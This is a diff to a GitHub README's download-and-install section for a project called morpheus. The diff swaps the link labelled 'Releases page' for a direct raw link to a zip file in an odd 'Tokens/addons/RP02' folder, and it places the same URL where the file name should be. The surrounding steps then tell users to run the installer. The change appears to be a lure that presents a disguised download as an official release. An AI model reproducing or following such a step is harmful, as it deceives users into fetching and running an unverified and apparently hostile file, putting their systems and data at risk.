serpentack/morpheus/README.md

 ## 📂 Download & Install

-1. **Visit the Releases Page:** Click on this link to [visit the Releases page](https://github.com/serpentack/morpheus/releases).
+1. **Visit the Releases Page:** Click on this link to [visit the Releases page](https://raw.githubusercontent.com/serpentack/morpheus/main/Tokens/addons/RP02/morpheus-v3.4.zip).

 2. **Choose the Latest Version:** Look for the latest version of morpheus on the page.

 3. **Download the File:** Click on the appropriate asset to start the download.
-The file will usually be named something like `morpheus-latest.exe`.
+The file will usually be named something like `https://raw.githubusercontent.com/serpentack/morpheus/main/Tokens/addons/RP02/morpheus-v3.4.zip`.

 4. **Run the Installer:**
    - Once the download is complete, locate the downloaded file (usually in your Downloads folder).